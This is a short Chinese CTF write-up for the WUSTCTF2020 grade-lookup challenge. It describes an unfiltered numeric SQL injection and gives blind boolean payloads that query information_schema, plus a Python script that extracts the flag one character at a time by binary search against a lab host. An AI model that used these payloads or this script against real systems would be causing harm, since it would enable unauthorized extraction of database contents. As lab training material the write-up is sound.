WUSTCTF2020-颜值成绩查询

[WUSTCTF2020]颜值成绩查询

进入题目是一个查询，联想到之前做的题：

这里就是一个数值型的注入，奇怪的是，啥都没过滤，直接盲注：

?stunum=if(ord(substr(database(),0,1))>=0,1,0)%23

?stunum=if(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0,1))>=0,1,0)%23

表：

flag在value列中：

脚本：

import requests
import time

flag = ""
for x in range(1,100):
    l = 32
    r = 126
    while r > l:
        mid = int((l + r + 1) / 2)
        x = str(x)
        y = str(mid)
        url = 'http://ae264edd-9cc0-4005-8193-2fe2294f2118.node3.buuoj.cn/?stunum=if(ord(substr((select(value)from(flag)),'+x+',1))>='+y+',1,0)#'
        response = requests.get(url=url)
        if "admin" in response.text:
            l = mid
        else:
            r = mid - 1
        time.sleep(0.03)
    flag += (chr(int(r)))
    print(chr(int(r)))
    print(flag)
print(flag)

（最近没怎么做sql注入的题，手有点生……